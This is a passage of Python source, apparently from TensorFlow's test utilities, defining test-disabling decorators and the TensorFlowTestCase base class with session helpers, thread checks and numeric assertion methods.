execute_func = not is_mlir_bridge_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
def disable_tfrt_impl(cls_or_func):
"""Execute the test only if tfrt is not enabled."""
if tf_inspect.isclass(cls_or_func):
if is_tfrt_enabled():
return None
else:
return cls_or_func
else:
def decorator(func):
def decorated(self, *args, **kwargs):
if is_tfrt_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if cls_or_func is not None:
return decorator(cls_or_func)
return decorator
return disable_tfrt_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
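# A usage sketch for `for_all_test_methods` (hypothetical class): it lifts a
# method-level decorator factory to the class level, e.g. applying disable_xla
# with its description argument to every test method:
#
#   @test_util.for_all_test_methods(test_util.disable_xla,
#                                   "times out under XLA")
#   class BigKernelTest(test_util.TensorFlowTestCase):
#
#     def testLargeMatmul(self):
#       ...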
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
"""This test is not intended to be run with XLA auto jit enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
self._threads = []
self._tempdir = None
self._cached_session = None
self._test_start_time = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
self._test_start_time = time.time()
def tearDown(self):
# If a subclass overrides setUp and doesn't call the parent class's setUp,
# then we may not have set the start time.
if self._test_start_time is not None:
logging.info("time(%s): %ss", self.id(),
round(time.time() - self._test_start_time, 2))
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
    If you call this method multiple times during a test, it will return the
    same folder. However, across different runs the directories will be
    different. This will ensure that across different runs tests will not be
    able to pollute each other's environment.
    If you need multiple unique directories within a single test, you should
    use tempfile.mkdtemp as follows:
      tempfile.mkdtemp(dir=self.get_temp_dir())
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
    Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
    in case of failure, as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
      self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
# Convert tensors and composite tensors to numpy arrays.
return nest.map_structure(lambda t: t.numpy(), tensor,
expand_composites=True)
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned
    to the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned
    to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
        self._testcase.failureException: If the thread terminates due to
          an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
        RuntimeError: If the thread is not terminated. This means the thread
          was not joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
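  # A usage sketch for `checkedThread` (the worker below is hypothetical): an
  # exception raised inside the thread is re-raised on join(), so the failure
  # is attributed to the test instead of being silently swallowed:
  #
  #   def testConcurrentWorker(self):
  #     def worker():
  #       self.assertGreater(some_computation(), 0)
  #     t = self.checkedThread(target=worker)
  #     t.start()
  #     t.join()  # fails the test if `worker` raised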
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tensor(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
      # Try to directly compare a, b as ndarrays; if that doesn't work, then
      # traverse through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
      a: The expected numpy `ndarray`, or anything that can be converted into
        a numpy `ndarray` (including Tensor), or any arbitrarily nested
        structure of these.
      b: The actual numpy `ndarray`, or anything that can be converted into
        a numpy `ndarray` (including Tensor), or any arbitrarily nested
        structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = %r" % x)
msgs.append("not equal rhs = %r" % y)
# With Python 3, we need to make sure the dtype matches between a and b.
b = b.astype(a.dtype)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
    If limit == N, this method will print up to the first N subscripts on
    separate lines. A line of ellipses (...) will be appended at the end if
    the number of subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
